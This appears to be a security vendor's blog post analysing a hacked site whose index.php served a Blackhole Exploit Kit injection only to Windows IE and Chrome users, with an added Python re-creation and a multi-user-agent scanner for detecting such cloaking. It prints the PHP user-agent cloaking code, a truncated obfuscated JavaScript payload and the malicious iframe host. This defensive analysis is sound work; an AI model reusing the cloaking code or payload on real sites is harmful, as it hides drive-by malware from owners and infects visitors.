The Latest in IT Security

Ask Sucuri: Why I Only Get Malware Warning on Certain Browsers?

10 Jan 2012

(Sucuri.net) A few days ago, our scanner alerted that a site had malware related to the Blackhole Exploit Kit. The owner of the site said that when he visited the site, nothing happened, and the malware wasn’t displayed – probably thinking it was a false positive.

After a bit of manual testing, we noted that the malware was only being displayed to certain browsers (IE and Chrome on Windows), and not on the others.

Once we got access to the site, we learned why. It had the following code in the index.php file:

error_reporting(0);                 // hide any PHP errors from the visitor
$bot = FALSE;
$ua = $_SERVER['HTTP_USER_AGENT'];
// Any visitor whose user agent contains one of these substrings is treated
// as a "bot" (or an unwanted platform/browser) and gets the clean page.
$botsUA = array('12345','alexa.com','anonymouse.org','bdbrandprotect.com',
'blogpulse.com','bot','buzztracker.com','crawl','docomo','drupal.org',
'httpclient','internetseer.com','linux','macintosh','mac os','magent','mailru',
'netcraft','openacoon.de','opera mini','opera mobi','playstation',
'rssreader','slurp','snoopy','spider','spyder',
'validator','virus','vlc media player','webcollage','wordpress','x11',
'iphone','android','firefox');
// Case-insensitive substring match; stop at the first hit.
foreach ($botsUA as $bs) { if (strpos(strtolower($ua), $bs) !== false) { $bot = true; break; } }
// Everyone else (in practice Windows users on IE or Chrome) gets the injected script.
if (!$bot) {
echo(base64_decode("PHNjcmlwdD5pZih3aW5kb3cuZG9jdW1lbnQpYT0icmYzIi5zcGx.

Do you know what it does? It checks the user agent (aka browser) of the person visiting the site and only displays the malware if it does not contain the strings “Linux”, “Mac”, “Iphone”, “Firefox”, “Bot”, “Virus”, etc.

So if you are on a Mac, or Linux, or using Firefox, nothing would happen. However, when you go to the site using Windows and IE or Chrome, it would attempt to compromise your browser/computer.

This makes it much harder for the owner of the site to detect the malware and take action to remove it. That’s why our malware scanner uses multiple browsers, referrers, and user agents to try to catch any hidden malicious code. So just because you can’t see it, doesn’t mean it is not there :)
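As an added example (not code from the Sucuri post), here is the cloaking decision from the injected index.php re-created in Python next to the kind of multi-user-agent probe a scanner uses to expose it. The marker list is copied from the PHP above; the user-agent strings, page bodies and the placeholder payload are constructed for the example.

```python
import hashlib
from typing import Callable, Dict, List

# Markers copied from the injected PHP: a UA containing any of them is
# treated as a bot / unwanted platform and gets the clean page.
BOT_MARKERS = [
    "12345", "alexa.com", "anonymouse.org", "bdbrandprotect.com",
    "blogpulse.com", "bot", "buzztracker.com", "crawl", "docomo", "drupal.org",
    "httpclient", "internetseer.com", "linux", "macintosh", "mac os", "magent",
    "mailru", "netcraft", "openacoon.de", "opera mini", "opera mobi",
    "playstation", "rssreader", "slurp", "snoopy", "spider", "spyder",
    "validator", "virus", "vlc media player", "webcollage", "wordpress", "x11",
    "iphone", "android", "firefox",
]

CLEAN_PAGE = "<html><body>Welcome</body></html>"          # constructed
INJECTED = "<script>/* placeholder for the decoded payload */</script>"

def cloaked_server(user_agent: str) -> str:
    """Same decision as the PHP foreach/strpos loop: the injection is only
    appended when no marker matches the lower-cased User-Agent."""
    ua = user_agent.lower()
    if any(marker in ua for marker in BOT_MARKERS):
        return CLEAN_PAGE
    return CLEAN_PAGE + INJECTED

# Constructed probe set: one URL, fetched as several very different clients.
PROBE_AGENTS = {
    "ie_windows": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)",
    "chrome_windows": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.7 Chrome/16.0 Safari/535.7",
    "firefox_windows": "Mozilla/5.0 (Windows NT 6.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1",
    "safari_mac": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) Version/5.1.2 Safari/534.52",
    "googlebot": "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
}

def scan_for_cloaking(fetch: Callable[[str], str],
                      agents: Dict[str, str]) -> Dict[str, List[str]]:
    """Fetch once per user agent and group the labels by response hash.
    More than one group means the server varies content by client, which
    is the cue to pull the differing responses for manual inspection."""
    groups: Dict[str, List[str]] = {}
    for label, ua in agents.items():
        digest = hashlib.sha256(fetch(ua).encode()).hexdigest()
        groups.setdefault(digest, []).append(label)
    return groups

def is_cloaked(fetch: Callable[[str], str], agents: Dict[str, str]) -> bool:
    return len(scan_for_cloaking(fetch, agents)) > 1
```

Against a real site, `fetch` would be a function that performs the HTTP request with the given User-Agent header; the grouping logic stays the same.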

Technical details

If you are curious about what the code above does after being decoded, it prints the following JavaScript at the bottom of the page:

<script>if(window.document)a="rf3".split("5236").pop+'qwe';a=a["spli"+"t"]("").reverse()["po"+"p"]();if(a=='f'||a=="\n")
f=[5,5,101,98,28,36,96,107,95,113,105,97,106,112,42,99,97,112,65,104,97,105,97,
106,112,111,62,117,80,93,99,74,93,105,97,36,35,94,107,96,117,35,37,87,44,89,37,
119,5,5,5,101,98,110..

When this script is read by the browser, it creates an iframe pointing to http://vvesek.freetcp.com/i/i.php?go=1 (and variations – these domains change often), from which the actual Blackhole Exploit Kit code is loaded.

Conclusion

This is just one example of why users sometimes complain of malware when visiting a site while the owner doesn’t see it. It can also lead to Sucuri scanner alerts that the owner can’t trace to anything on the site. If you have any questions, let us know.
